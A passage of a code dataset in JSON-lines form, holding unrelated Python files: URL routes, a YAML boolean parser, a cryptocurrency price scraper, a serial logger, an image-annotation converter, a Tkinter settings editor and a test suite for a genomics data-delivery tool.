views.AdminList.as_view(), name='admin_list'),\n\tpath('user//edit', views.EditUser.as_view(), name='edit_user'),\n\tpath('user/', views.UserProfile.as_view(), name='user_profile'),\n]","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"38619507","text":"\"\"\"Boolean field class & utilities.\"\"\"\nfrom gettext import gettext as _\nfrom typing import Any\n\nfrom pofy.core.errors import ErrorCode\nfrom pofy.core.constants import UNDEFINED\nfrom pofy.fields.base_field import ScalarField\nfrom pofy.core.interfaces import ILoadingContext\n\n\nclass BoolField(ScalarField):\n \"\"\"Boolean YAML object field.\"\"\"\n\n def _convert(self, context: ILoadingContext) -> Any:\n node = context.current_node()\n true_values = [\n 'y', 'Y', 'yes', 'Yes', 'YES',\n 'true', 'True', 'TRUE',\n 'on', 'On', 'ON'\n ]\n false_values = [\n 'n', 'N', 'no', 'No', 'NO',\n 'false', 'False', 'FALSE',  # comma added: 'FALSE' and 'off' previously concatenated to 'FALSEoff'\n 'off', 'Off', 'OFF'\n ]\n\n value = node.value\n if value in true_values:\n return True\n\n if value in false_values:\n return False\n\n context.error(\n ErrorCode.VALUE_ERROR,\n _('Boolean value should be one of {}'),\n ', '.join(true_values + false_values)\n )\n\n return UNDEFINED\n","sub_path":"pofy/fields/bool_field.py","file_name":"bool_field.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"573055137","text":"import pickle\nfrom pathlib import Path\nfrom datetime import datetime, date\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n_coinmarketcap_data_filename = \"tmp/{}-coinmarketcap-data.pickle\"\n_pricehistory_filename = \"tmp/{}-pricehistory.pickle\"\n\n\ncurrency2symbolmap = {\n \"bitcoin\": \"XXBT\",\n \"ethereum\": \"XETH\",\n \"stellar\": \"XXLM\"\n}\n\n\ndef get_data_from_coinmarketcap(currency):\n r = requests.get(f\"https://coinmarketcap.com/currencies/{currency}/historical-data/?start=20140101&end=20180423\")\n with open(_coinmarketcap_data_filename.format(currency), \"wb\") as f:\n pickle.dump(r, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_data(currency):\n filename = _coinmarketcap_data_filename.format(currency)\n if not Path(filename).exists():\n print(f\"Didn't find data file for {currency}, downloading...\")\n get_data_from_coinmarketcap(currency)\n with open(filename, \"rb\") as f:\n return 
pickle.load(f)\n\n\ndef parse_table(doc):\n soup = BeautifulSoup(doc, 'html.parser')\n tables = soup.find_all(\"table\")\n\n headers = [el.text.lower() for el in tables[0].find_all(\"th\")]\n rows = []\n\n for row in tables[0].find_all(\"tr\"):\n cells = [el.text for el in row.find_all(\"td\")]\n if len(cells) == len(headers):\n rows.append({k: v for k, v in zip(headers, cells)})\n elif cells:\n print(f\"Incomplete row: {cells}\")\n\n d = {datetime.strptime(r[\"date\"], \"%b %d, %Y\").date(): r for r in rows}\n for k, v in d.items():\n v.pop(\"date\")\n v.pop(\"market cap\")\n d[k] = {ohlc: float(d[k][ohlc].replace(\",\", \"\")) for ohlc in d[k]}\n return d\n\n\ndef _save_table(currency, data):\n with open(_pricehistory_filename.format(currency2symbolmap[currency]), \"wb\") as f:\n pickle.dump(data, f)\n print(f\"Price history for {currency} saved!\")\n\n\ndef test_everything():\n data = load_data(\"bitcoin\")\n tablebtc = parse_table(data.text)\n\n assert all(k in tablebtc[date(2017, 1, 1)] for k in [\"open\", \"high\", \"low\", \"close\"])\n\n data = load_data(\"ethereum\")\n tableeth = parse_table(data.text)\n\n assert tablebtc[date(2017, 1, 1)][\"open\"] != tableeth[date(2017, 1, 1)][\"open\"]\n\n\nif __name__ == \"__main__\":\n # get_data(\"bitcoin\")\n for currency in [\"bitcoin\", \"ethereum\", \"stellar\"]:\n print(f\"Getting price history for {currency}...\")\n data = load_data(currency)\n table = parse_table(data.text)\n _save_table(currency, table)\n\n # print(data.text)\n","sub_path":"download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"646054205","text":"import serial\nimport pickle\n\nframe = bytearray()\ndata = list()\n\nBYTES_TO_READ = 2000\nlog_name = \"/home/hkeene/pool/aqualogic/playground/logs/raw.bin\"\n\nif __name__ == '__main__':\n\n ser = serial.Serial(\n port = '/dev/ttyUSB0',\\\n baudrate = 19200)\n print(\"Connected to: \" + ser.portstr)\n\n #Prime the prev for the first time loop\n read = ser.read(BYTES_TO_READ)\n with open (log_name, \"wb\") as fp:\n pickle.dump(read, fp)\n\n ser.close()\n","sub_path":"playground/save_raw.py","file_name":"save_raw.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"648315120","text":"# -*- coding: utf-8 -*-\nimport random as r\nimport os\nfrom PIL import Image\nimport h5py\nimport json\n\n\ntrain_folder = \"train\"\ntrainImgIDSet = set()\nerrorImgIDSet = set()\ncoco_dict = {\n \"images\": [],\n \"annotations\": [],\n \"categories\": [{\"id\": i, \"name\": \"{}\".format(i % 10)} for i in range(1, 11)],\n}\n\nval_coco_dict = {\n \"images\": [],\n \"annotations\": [],\n \"categories\": [{\"id\": i, \"name\": \"{}\".format(i % 10)} for i in range(1, 11)],\n}\n\nerror_coco_dict = {\n \"images\": [],\n \"annotations\": [],\n \"categories\": [{\"id\": i, \"name\": \"{}\".format(i % 10)} for i in range(1, 11)],\n}\n\nfor root, dirs, files in os.walk(train_folder):\n for f in files:\n name_cut = f.split(\".\")\n if name_cut[-1] == \"png\":\n im = Image.open(os.path.join(root, f))\n width, height = im.size\n temp_dict = {\n \"file_name\": f,\n \"height\": height,\n \"width\": width,\n \"id\": int(name_cut[0]),\n }\n if r.randint(0, 33402) > 1000:\n coco_dict[\"images\"].append(temp_dict)\n trainImgIDSet.add(int(name_cut[0]))\n else:\n val_coco_dict[\"images\"].append(temp_dict)\n if r.randint(0, 33402) 
< 100:\n error_coco_dict[\"images\"].append(temp_dict)\n errorImgIDSet.add(int(name_cut[0]))\n\n\ndef get_name(index, hdf5_data):\n name = hdf5_data[\"/digitStruct/name\"]\n return \"\".join([chr(v[0]) for v in hdf5_data[name[index][0]][()]])\n\n\ndef get_bbox(index, hdf5_data):\n attrs = {}\n item = hdf5_data[\"digitStruct\"][\"bbox\"][index].item()\n for key in [\"label\", \"left\", \"top\", \"width\", \"height\"]:\n attr = hdf5_data[item][key]\n values = (\n [hdf5_data[attr[()][i].item()][()][0][0] for i in range(len(attr))]\n if len(attr) > 1\n else [attr[()][0][0]]\n )\n attrs[key] = values\n return attrs\n\n\ndef img_boundingbox_data_constructor(mat_file):\n f = h5py.File(mat_file, \"r\")\n print(\"image bounding box data construction starting...\")\n for j in range(f[\"/digitStruct/bbox\"].shape[0]):\n row_dict = get_bbox(j, f)\n for i in range(len(row_dict[\"label\"])):\n temp_dict = {\n \"area\": row_dict[\"width\"][i] * row_dict[\"height\"][i],\n \"iscrowd\": 0,\n \"image_id\": int(get_name(j, f).split(\".\")[0]),\n \"bbox\": [\n row_dict[\"left\"][i],\n row_dict[\"top\"][i],\n row_dict[\"width\"][i],\n row_dict[\"height\"][i],\n ],\n \"category_id\": int(row_dict[\"label\"][i]),\n \"id\": j,\n }\n if int(get_name(j, f).split(\".\")[0]) in trainImgIDSet:\n coco_dict[\"annotations\"].append(temp_dict)\n else:\n val_coco_dict[\"annotations\"].append(temp_dict)\n if int(get_name(j, f).split(\".\")[0]) in errorImgIDSet:\n error_coco_dict[\"annotations\"].append(temp_dict)\n print(\"finished image bounding box data construction...\")\n\n\nbbox_df = img_boundingbox_data_constructor(\n os.path.join(train_folder, \"digitStruct.mat\")\n)\nwith open(\n os.path.join(train_folder, \"train_data_processed.json\"), \"w\", encoding=\"utf-8\"\n) as f:\n json.dump(coco_dict, f, ensure_ascii=False)\n\nwith open(\n os.path.join(train_folder, \"val_data_processed.json\"), \"w\", encoding=\"utf-8\"\n) as f:\n json.dump(val_coco_dict, f, ensure_ascii=False)\n\nwith open(\n os.path.join(train_folder, \"error_data_processed.json\"), \"w\", encoding=\"utf-8\"\n) as f:\n json.dump(error_coco_dict, f, ensure_ascii=False)\n","sub_path":"to_coco_format.py","file_name":"to_coco_format.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"413176396","text":"from Tkinter import *\nfrom tkColorChooser import askcolor\nimport json\n\ntry:\n\tf = open(\"../assets/settings.json\")\nexcept IOError:\n\tf = open(\"assets/settings.json\")\ndecoder = json.JSONDecoder()\n\ndict = decoder.decode(f.read())\n\nf.close()\n\nwidth =dict[\"width\"]\nheight=dict[\"height\"]\n\ndef error(message):\n\terror = Tk()\n\terror.wm_title(\"Rapyd Error!\")\n\tlbl = Label(error,text=message)\n\tlbl.pack()\n\terror.mainloop()\n\ndef getColor():\n\tcolor =(dict[\"color\"][0], dict[\"color\"][1], dict[\"color\"][2])\t\n\n\tnewcolor = askcolor(color=color)\n\tif (newcolor[0]!=None):\n\t\tcolor = newcolor[0]\n\n\tdict[\"color\"][0] = color[0]\n\tdict[\"color\"][1] = color[1]\n\tdict[\"color\"][2] = color[2]\n\ndef aboutCallback():\n\tabout = Tk()\n\tabout.wm_title(\"About Rapyd v0.1\")\n\tlbl = Label(about, text=\"Rapyd v0.1 - by Jed Stevens\\nEst. 
2015\")\n\taddr = Label(about, text=\"Find more at github.com/jedStevens/rapyd\")\n\tlbl.pack()\n\taddr.pack()\n\tabout.mainloop()\n\ndef saveCallback():\n\ttry:\n\t\tdict[\"width\"] = int(widthEntry.get())\n\t\tdict[\"height\"] = int(heightEntry.get())\n\texcept ValueError:\n\t\terror(\"Invalid Screen Size!\")\n\t\treturn\n\tencoder = json.JSONEncoder()\n\ttry:\n\t\tf = open(\"../assets/settings.json\", 'w')\n\texcept IOError:\n\t\tf = open(\"assets/settings.json\", 'w')\n\tf.write(encoder.encode(dict))\n\tf.close()\n\ndef exitCallback():\n\troot.quit()\n\nroot = Tk()\nroot.wm_title(\"Rapyd Settings\")\n\nmenu = Menu(root)\nroot.config(menu=menu)\n\nfilemenu = Menu(menu)\nmenu.add_cascade(label=\"File\", menu=filemenu)\nfilemenu.add_command(label=\"Save\", command=saveCallback)\nfilemenu.add_separator()\nfilemenu.add_command(label=\"Exit\", command=exitCallback)\n\nhelpmenu = Menu(menu)\nmenu.add_cascade(label=\"Help\", menu=helpmenu)\nhelpmenu.add_command(label=\"About\", command=aboutCallback)\n\nwidthLbl = Label(root, text=\"Screen Width: \")\nwidthLbl.grid(row=0,column=0,columnspan=2)\n\nwidthEntry = StringVar()\nwidthEntry.set(dict[\"width\"])\nwidthBox = Entry(root, textvariable=widthEntry)\nwidthBox.grid(row=0,column=3,columnspan=2)\n\nheightLbl = Label(root, text=\"Screen Height: \")\nheightLbl.grid(row=1, column=0, columnspan=2)\n\nheightEntry = StringVar()\nheightEntry.set(dict[\"height\"])\nheightBox = Entry(root, textvariable=heightEntry)\nheightBox.grid(row=1, column=3,columnspan=2)\n\ncolorLbl = Label(root, text=\"Fill Color\")\ncolorLbl.grid(row=2,column=0,columnspan=2)\n\ncolorBtn = Button(text=\"Choose Color\", command=getColor)\ncolorBtn.grid(row=2,column=2,columnspan=2)\n\nroot.mainloop()\n","sub_path":"editor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"598289941","text":"#!/usr/bin/python3\nfrom Language import Language\nfrom Requirement import Requirement\n \ndef main():\n languages = Language()\n requirements = Requirement(languages.language_dict)\n while True:\n language_name = languages.set_language_name()\n languages.write_dict_language()\n while True:\n requirements.set_requirement_name(language_name)\n requirements.write_requirements_name()\n print('Czy chcesz wyjść? T/N')\n c = input()\n if c == 'T' or c == 't':\n break\n elif c == 'N' or c == 'n':\n continue\n else:\n print('Coś poszło nie tak.')\n print('Czy chcesz wyjść? 
def main():\n languages = Language()\n requirements = Requirement(languages.language_dict)\n while True:\n language_name = languages.set_language_name()\n languages.write_dict_language()\n while True:\n requirements.set_requirement_name(language_name)\n requirements.write_requirements_name()\n print('Do you want to exit? T/N') # T/N keys kept from the original Polish prompt (Tak/Nie)\n c = input()\n if c == 'T' or c == 't':\n break\n elif c == 'N' or c == 'n':\n continue\n else:\n print('Something went wrong.')\n print('Do you want to exit? T/N')\n c = input()\n if c == 'T' or c == 't':\n break\n elif c == 'N' or c == 'n':\n continue\n else:\n print('Something went wrong.')\n \nif __name__ == '__main__':\n main()\n","sub_path":"projekty_cwiczeniowe-master/RozmowaKwalifikacyjna/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"418422795","text":"import os\nimport collections\nimport collections.abc\nimport operator\nimport shutil\nimport datetime\nimport itertools\nfrom email.mime.multipart import MIMEMultipart\nfrom unittest.mock import patch, Mock, PropertyMock\nfrom egcg_core.config import cfg\nfrom tests import TestProjectManagement, NamedMock\nfrom bin import deliver_reviewed_data as d\n\nsample_templates = {\n 'process_id1': {\n 'name': 'p1sample%s',\n 'nb_sample': 4,\n 'already_delivered_samples': [3, 4],\n 'samples': {\n 'project_id': 'project1',\n 'user_sample_id': 'p1_user_s_id%s',\n 'species_name': 'Homo sapiens',\n 'useable': 'yes',\n 'required_yield': 120000000000,\n 'required_coverage': 30,\n 'aggregated': {\n 'clean_reads': 39024000,\n 'yield_in_gb': 127,\n 'yield_q30_in_gb': 102,\n 'pc_q30': 85.2,\n 'pc_mapped_reads': 99.1,\n 'pc_duplicate_reads': 16.4,\n },\n 'coverage': {'mean': 35},\n\n },\n 'lims/samples': {\n 'Delivery': 'merged',\n 'Total DNA(ng)': 2000\n },\n 'lims/status/sample_status': {\n 'library_type': 'pcrfree',\n 'started_date': '2017-08-02T11:25:14.659000'\n },\n 'run_elements': [\n {\n 'run_element_id': 'run1_el_s%s_id1',\n 'clean_reads': 15,\n 'run_id': 'run1',\n 'project_id': 'project1',\n 'lane': 1,\n 'useable': 'yes'\n },\n {\n 'run_element_id': 'run1_el_s%s_id2',\n 'clean_reads': 15,\n 'run_id': 'run1',\n 'project_id': 'project1',\n 'lane': 2,\n 'useable': 'yes'\n }\n ]\n },\n 'process_id2': {\n 'name': 'p2sample%s',\n 'samples': {\n 'project_id': 'project2',\n 'user_sample_id': 'p2_user_s_id%s',\n 'species_name': 'Homo sapiens',\n 'useable': 'yes',\n 'required_yield': 120000000000,\n 'required_coverage': 30,\n 'aggregated': {\n 'clean_reads': 39024000,\n 'yield_in_gb': 127,\n 'yield_q30_in_gb': 102,\n 'pc_q30': 85.2,\n 'pc_mapped_reads': 99.1,\n 'pc_duplicate_reads': 16.4,\n },\n 'coverage': {'mean': 35},\n },\n 'lims/samples': {\n '2D Barcode': 'Fluidx%s',\n 'Delivery': 'split',\n 'Total DNA(ng)': 2000\n },\n 'lims/status/sample_status': {\n 'library_type': 'nano',\n 'started_date': '2017-08-02T11:25:14.659000'\n },\n 'run_elements': [\n {\n 'run_element_id': 'run1_el_s%s_id3',\n 'clean_reads': 15,\n 'run_id': 'run1',\n 'project_id': 'project2',\n 'lane': 3,\n 'useable': 'yes'\n },\n {\n 'run_element_id': 'run1_el_s%s_id4',\n 'clean_reads': 15,\n 'run_id': 'run1',\n 'project_id': 'project1',\n 'lane': 4,\n 'useable': 'yes'\n }\n ]\n }\n}\n\n\ndef _get_value(value_template, index):\n \"\"\"\n Take a template and complete it with the index if the template contains %s.\n If the template is an iterable (but not a string or dict) then it takes the next one and completes the template.\n \"\"\"\n if not (type(value_template) in [str, dict]) and isinstance(value_template, collections.abc.Iterable): # collections.Iterable was removed in Python 3.10\n value_template = next(value_template)\n if isinstance(value_template, str) and '%s' in value_template:\n return value_template % index\n else:\n return value_template\n\n\nrest_responses = {'samples': {}, 'lims/samples': {}, 'lims/status/sample_status': {}, 'run_elements': {}}\nfake_processes = {}\nfor process in sample_templates:\n artifacts = []\n for i in range(1, 
sample_templates[process].get('nb_sample', 2) + 1):\n sample_id = sample_templates[process]['name'] % i\n if i not in sample_templates[process].get('already_delivered_samples', []):\n artifacts.append(Mock(samples=[NamedMock(name=sample_id)]))\n\n for endpoint in ('samples', 'lims/samples', 'lims/status/sample_status'):\n rest_responses[endpoint][sample_id] = dict([\n (k, _get_value(v, i)) for k, v in sample_templates[process].get(endpoint, {}).items()\n ])\n rest_responses[endpoint][sample_id]['sample_id'] = sample_id\n rest_responses['run_elements'][sample_id] = []\n for re_template in sample_templates[process].get('run_elements', []):\n re = dict((k, _get_value(v, i)) for k, v in re_template.items())\n re['sample_id'] = sample_id\n rest_responses['run_elements'][sample_id].append(re)\n\n fake_processes[process] = Mock(\n type=NamedMock(name=d.release_trigger_lims_step_name),\n all_inputs=Mock(return_value=artifacts)\n )\n\n\ndef fake_get_document(*args, **kwargs):\n match = kwargs.get('where') or kwargs['match']\n if 'sample_id' in match:\n return rest_responses.get(args[0], {}).get(match['sample_id'])\n if 'project_id' in match:\n return [rr for rr in rest_responses.get(args[0], {}).values() if rr['project_id'] == match['project_id']]\n\n\npatch_get_document = patch('egcg_core.rest_communication.get_document', side_effect=fake_get_document)\npatch_get_documents = patch('egcg_core.rest_communication.get_documents', side_effect=fake_get_document)\npatch_get_queue = patch('egcg_core.clarity.get_queue_uri', return_value='http://testclarity.com/queue/999')\n\n\nclass FakeProcessPropertyMock(PropertyMock):\n \"\"\"PropertyMock specifically to return fake processes.\"\"\"\n def __get__(self, obj, obj_type):\n return fake_processes.get(obj.process_id)\n\n\npatch_process = patch.object(d.DataDelivery, 'process', new=FakeProcessPropertyMock())\n\n\ndef touch(f, content=None):\n with open(f, 'w') as open_file:\n if content:\n open_file.write(content)\n\n\ndef create_fake_fastq_fastqc_md5_from_commands(instance):\n \"\"\"\n This function replaces run_aggregate_commands and take an instance of DataDelivery.\n It will create the output as if the command were run.\n It only supports fastqc and command that redirects there outputs\n \"\"\"\n for commands in instance.all_commands_for_cluster:\n for command in commands.split(';'):\n if len(command.split('>')) > 1:\n output = command.split('>')[1].strip()\n if output.endswith('.md5'):\n touch(output, 'd41d8cd98f00b204e9800998ecf8427e ' + os.path.basename(output))\n else:\n touch(output)\n elif command.strip().startswith('fastqc'):\n touch(command.split()[-1].split('.fastq')[0] + '_fastqc.zip')\n touch(command.split()[-1].split('.fastq')[0] + '_fastqc.html')\n\n\nclass TestDataDelivery(TestProjectManagement):\n config_file = 'example_data_delivery.yaml'\n assets_delivery = os.path.join(TestProjectManagement.assets_path, 'data_delivery')\n analysis_exts = ['.bam', '.bam.bai', '.bam.bai.md5', '.bam.md5', '.g.vcf.gz', '.g.vcf.gz.md5', '.g.vcf.gz.tbi',\n '.g.vcf.gz.tbi.md5', '.vcf.gz', '.vcf.gz.md5', '.vcf.gz.tbi', '.vcf.gz.tbi.md5']\n raw_data_exts = ['_R1.fastq.gz', '_R1.fastq.gz.md5', '_R1_fastqc.html', '_R1_fastqc.zip', '_R2.fastq.gz',\n '_R2.fastq.gz.md5', '_R2_fastqc.html', '_R2_fastqc.zip']\n final_files_split = ['p2_user_s_id1' + ext for ext in analysis_exts] + ['raw_data']\n final_files_merged = ['p1_user_s_id1' + ext for ext in analysis_exts + raw_data_exts]\n final_files_merged2 = ['p1_user_s_id2' + ext for ext in analysis_exts + raw_data_exts]\n 
final_files_merged_no_raw = ['p1_user_s_id1' + ext for ext in analysis_exts]\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.dest_dir = cfg['delivery']['dest']\n\n def setUp(self):\n os.makedirs(self.dest_dir, exist_ok=True)\n staging_dir = os.path.join(self.assets_delivery, 'staging')\n self.delivery_dry_split_fluidx = d.DataDelivery(dry_run=True, work_dir=staging_dir, process_id='process_id2', no_cleanup=True, email=False)\n self.delivery_real_split_fluidx = d.DataDelivery(dry_run=False, work_dir=staging_dir, process_id='process_id2', email=False)\n self.delivery_dry_merged = d.DataDelivery(dry_run=True, work_dir=staging_dir, process_id='process_id1', no_cleanup=True, email=False)\n self.delivery_real_merged = d.DataDelivery(dry_run=False, work_dir=staging_dir, process_id='process_id1', email=False)\n\n self._create_run_elements(itertools.chain.from_iterable(rest_responses['run_elements'].values()))\n self._create_analysed_sample_files(rest_responses['samples'].values())\n\n def tearDown(self):\n for directory in [self.delivery_dry_split_fluidx.staging_dir, self.delivery_dry_merged.staging_dir]:\n if os.path.exists(directory):\n shutil.rmtree(directory)\n\n for directory in [\n self.dest_dir,\n os.path.join(self.assets_delivery, 'source'),\n os.path.join(self.assets_delivery, 'runs')\n ]:\n for d in os.listdir(directory):\n shutil.rmtree(os.path.join(directory, d))\n\n def _create_run_elements(self, list_run_elements):\n for e in list_run_elements:\n sample_dir = os.path.join(self.assets_delivery, 'runs', e['run_id'], e['project_id'], e['sample_id'])\n os.makedirs(sample_dir, exist_ok=True)\n for t in [\n 'S1_L00%s_R1.fastq.gz', 'S1_L00%s_R2.fastq.gz',\n 'S1_L00%s_R1_fastqc.html', 'S1_L00%s_R2_fastqc.html',\n 'S1_L00%s_R1_fastqc.zip', 'S1_L00%s_R2_fastqc.zip'\n ]:\n open(os.path.join(sample_dir, t % e['lane']), 'w').close()\n self.md5(os.path.join(sample_dir, t % e['lane']))\n\n def _create_analysed_sample_files(self, list_samples):\n for s in list_samples:\n sample_dir = os.path.join(self.assets_delivery, 'source', s['project_id'], s['sample_id'])\n os.makedirs(sample_dir, exist_ok=True)\n for t in ['%s.bam', '%s.bam.bai', '%s.g.vcf.gz', '%s.g.vcf.gz.tbi', '%s.vcf.gz', '%s.vcf.gz.tbi']:\n f = os.path.join(sample_dir, t % s['user_sample_id'])\n open(f, 'w').close()\n self.md5(f)\n\n def test_mark_samples_as_released(self):\n delivered_date = datetime.datetime(2018, 1, 10)\n with patch('bin.deliver_reviewed_data._now', return_value=delivered_date), \\\n patch('egcg_core.rest_communication.patch_entry') as mpatch, \\\n patch('egcg_core.clarity.route_samples_to_workflow_stage') as mroute:\n self.delivery_real_merged.samples2files = {\n 'p1sample1': [{'file_path': 'path to file1'}],\n 'p1sample2': [{'file_path': 'path to file2'}],\n }\n self.delivery_real_merged.mark_samples_as_released(['p1sample1', 'p1sample2'])\n mpatch.assert_any_call(\n 'samples', element_id='p1sample1', id_field='sample_id',\n payload={\n 'delivered': 'yes',\n 'files_delivered': [{'file_path': 'path to file1'}],\n 'delivery_date': delivered_date\n },\n update_lists=['files_delivered']\n )\n mpatch.assert_called_with(\n 'samples', element_id='p1sample2', id_field='sample_id',\n payload={\n 'delivered': 'yes',\n 'files_delivered': [{'file_path': 'path to file2'}],\n 'delivery_date': delivered_date\n },\n update_lists=['files_delivered']\n )\n mroute.assert_called_with(\n ['p1sample1', 'p1sample2'],\n 'Data Release workflow',\n stage_name='Data Release stage'\n )\n\n def 
test_deliverable_samples(self):\n with patch_process, patch_get_document, patch_get_documents:\n project_to_samples = self.delivery_dry_merged.deliverable_samples\n assert list(project_to_samples) == ['project1']\n assert [sample['sample_id'] for samples in project_to_samples.values() for sample in samples] == ['p1sample1', 'p1sample2']\n\n def test_summarise_metrics_per_sample(self):\n with patch_process, patch_get_document, patch_get_documents:\n _ = self.delivery_dry_merged.deliverable_samples\n expected_header = ['Project', 'Sample Id', 'User sample id', 'Species', 'Library type', 'Received date',\n 'DNA QC (ng)', 'Number of Read pair', 'Target Yield', 'Yield', 'Yield Q30', '%Q30',\n 'Mapped reads rate', 'Duplicate rate', 'Target Coverage', 'Mean coverage',\n 'Delivery folder']\n\n expected_lines = [\n 'project1\\tp1sample1\\tp1_user_s_id1\\tHomo sapiens\\tTruSeq PCR-Free\\t2017-08-02\\t2000\\t39024000\\t'\n '120.0\\t127\\t102\\t85.2\\t99.1\\t16.4\\t30\\t35\\tdate_delivery',\n 'project1\\tp1sample2\\tp1_user_s_id2\\tHomo sapiens\\tTruSeq PCR-Free\\t2017-08-02\\t2000\\t39024000\\t'\n '120.0\\t127\\t102\\t85.2\\t99.1\\t16.4\\t30\\t35\\tdate_delivery'\n ]\n header, lines = self.delivery_dry_merged.summarise_metrics_per_sample(\n project_id='project1',\n delivery_folder='date_delivery'\n )\n assert header == expected_header\n assert sorted(lines) == sorted(expected_lines)\n\n def test_overwrite_metrics_file(self):\n os.makedirs(os.path.join(self.dest_dir, 'project1'), exist_ok=True)\n metrics_lines = [\n 'Project\\tSample Id\\tUser sample id\\tSpecies\\tLibrary type\\tReceived date\\tDNA QC (ng)\\t'\n 'Number of Read pair\\tTarget Yield\\tYield\\tYield Q30\\t%Q30\\tMapped reads rate\\tDuplicate rate\\t'\n 'Target Coverage\\tMean coverage\\tDelivery folder',\n 'project1\\tp1sample3\\tp1_user_s_id1\\tHomo sapiens\\tTruSeq PCR-Free\\t2017-08-02\\t2000\\t39024000\\t'\n '120.0\\t127\\t102\\t85.2\\t99.1\\t16.4\\t30\\t35\\tdate_delivery1',\n 'project1\\tp1sample4\\tp1_user_s_id2\\tHomo sapiens\\tTruSeq PCR-Free\\t2017-08-02\\t2000\\t39024000\\t'\n '120.0\\t127\\t102\\t85.2\\t99.1\\t16.4\\t30\\t35\\tdate_delivery1'\n ]\n summary_file = os.path.join(self.dest_dir, 'project1', 'summary_metrics.csv')\n with open(summary_file, 'w') as open_file:\n open_file.write('\\n'.join(metrics_lines))\n\n with patch_process, patch_get_document, patch_get_documents:\n _ = self.delivery_dry_merged.deliverable_samples\n self.delivery_dry_merged.write_metrics_file(\n project='project1',\n delivery_folder='date_delivery2'\n )\n with open(summary_file, 'r') as open_file:\n lines = open_file.readlines()\n assert len(lines) == 5\n assert lines[1].endswith('date_delivery1\\n')\n assert lines[2].endswith('date_delivery1\\n')\n assert lines[3].endswith('date_delivery2\\n')\n assert lines[4].endswith('date_delivery2\\n')\n\n def test_overwrite_old_metrics_file(self):\n os.makedirs(os.path.join(self.dest_dir, 'project1'), exist_ok=True)\n metrics_lines = [\n 'Project\\tSample Id\\tUser sample id\\tRead pair sequenced\\tYield\\tYield Q30\\tNb reads in bam\\t'\n 'mapping rate\\tproperly mapped reads rate\\tduplicate rate\\tMean coverage\\tDelivery folder',\n 'project1\\tp1sample3\\tp1_user_s_id1\\t39024000\\t127\\t102\\t39823000\\t99.1\\t92.3\\t16.4\\t35\\tdate_delivery1',\n 'project1\\tp1sample4\\tp1_user_s_id2\\t39024000\\t127\\t102\\t39823000\\t99.1\\t92.3\\t16.4\\t35\\tdate_delivery1'\n ]\n summary_file = os.path.join(self.dest_dir, 'project1', 'summary_metrics.csv')\n with open(summary_file, 'w') as open_file:\n 
open_file.write('\\n'.join(metrics_lines))\n\n with patch_process, patch_get_document, patch_get_documents:\n _ = self.delivery_dry_merged.deliverable_samples\n self.delivery_dry_merged.write_metrics_file(\n project='project1',\n delivery_folder='date_delivery2'\n )\n with open(summary_file, 'r') as open_file:\n lines = open_file.readlines()\n assert len(lines) == 5\n assert lines[1].endswith('date_delivery1\\n')\n assert lines[2].endswith('date_delivery1\\n')\n assert lines[3].endswith('date_delivery2\\n')\n assert lines[4].endswith('date_delivery2\\n')\n\n def test_deliver_data_merged(self):\n with patch_process, patch_get_document, patch_get_documents, patch_get_queue:\n # Remove one of the run_element from rest response so the remaining one gets used as merged\n re = rest_responses['run_elements']['p1sample1'].pop()\n self.delivery_dry_merged.deliver_data()\n assert sorted(os.listdir(self.delivery_dry_merged.staging_dir)) == ['p1sample1', 'p1sample2']\n list_files = sorted(os.listdir(os.path.join(self.delivery_dry_merged.staging_dir, 'p1sample1')))\n assert list_files == sorted(self.final_files_merged)\n # Put it back\n rest_responses['run_elements']['p1sample1'].append(re)\n\n def test_deliver_data_merged_concat(self):\n with patch_process, patch_get_document, patch_get_documents, patch_get_queue:\n self.delivery_dry_merged.deliver_data()\n assert sorted(os.listdir(self.delivery_dry_merged.staging_dir)) == ['p1sample1', 'p1sample2']\n list_files = sorted(os.listdir(os.path.join(self.delivery_dry_merged.staging_dir, 'p1sample1')))\n assert list_files == sorted(self.final_files_merged_no_raw)\n assert len(self.delivery_dry_merged.all_commands_for_cluster) == 4\n\n def test_deliver_data_split(self):\n with patch_process, patch_get_document, patch_get_documents, patch_get_queue:\n self.delivery_dry_split_fluidx.deliver_data()\n assert sorted(os.listdir(self.delivery_dry_split_fluidx.staging_dir)) == ['Fluidx1', 'Fluidx2']\n list_files = os.listdir(os.path.join(self.delivery_dry_split_fluidx.staging_dir, 'Fluidx1'))\n assert sorted(list_files) == sorted(self.final_files_split)\n\n def test_deliver_data_merged_real(self):\n with patch_process, patch_get_document, patch_get_documents, patch_get_queue,\\\n patch('bin.deliver_reviewed_data.DataDelivery.mark_samples_as_released'), \\\n patch.object(d.DataDelivery, 'run_aggregate_commands', new=create_fake_fastq_fastqc_md5_from_commands), \\\n patch.object(d.DataDelivery, 'register_postponed_files'):\n self.delivery_real_merged.deliver_data()\n assert os.listdir(self.dest_dir) == ['project1']\n today = datetime.date.today().isoformat()\n assert sorted(os.listdir(os.path.join(self.dest_dir, 'project1'))) == [today, 'all_md5sums.txt', 'summary_metrics.csv']\n assert sorted(os.listdir(os.path.join(self.dest_dir, 'project1', today))) == ['p1sample1', 'p1sample2']\n assert sorted(self.final_files_merged2) == sorted(os.listdir(os.path.join(self.dest_dir, 'project1', today, 'p1sample2')))\n\n assert self.delivery_real_merged.samples2files['p1sample2'] == [\n {\n 'file_path': 'project1/%s/p1sample2/%s' % (today, f),\n 'size': 0,\n 